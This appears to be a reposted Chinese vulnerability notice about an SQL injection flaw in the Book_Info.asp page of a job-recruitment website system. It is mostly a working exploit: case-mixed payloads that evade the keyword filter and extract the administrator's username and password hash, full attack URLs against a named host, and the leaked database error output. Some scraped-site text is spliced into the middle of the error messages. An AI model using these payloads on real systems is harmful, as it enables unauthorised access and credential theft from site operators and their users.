漏洞出現(xiàn)在Educate/Book_Info.asp
此處注入點(diǎn)雖然過(guò)濾了一些關(guān)鍵字 但是我們還是可以盲注的 可以利用sqlmap跑出
exp:如下
查詢(xún)管理賬號(hào):+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
查詢(xún)管理密碼:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 '80040e07'
將 nvarchar 值 'hackbase' 轉(zhuǎn)換為數(shù)據(jù)類(lèi)型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤,
網(wǎng)絡(luò)求職招聘人才網(wǎng)站系統(tǒng)正式版漏洞漏洞預(yù)警
,電腦資料
《網(wǎng)絡(luò)求職招聘人才網(wǎng)站系統(tǒng)正式版漏洞漏洞預(yù)警》(http://www.szmdbiao.com)。/Educate/Book_Info.asp,行 8
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
Microsoft OLE DB Provider for SQL Server 錯(cuò)誤 '80040e07'
將 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 轉(zhuǎn)換為數(shù)據(jù)類(lèi)型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤。
/Educate/Book_Info.asp,行 8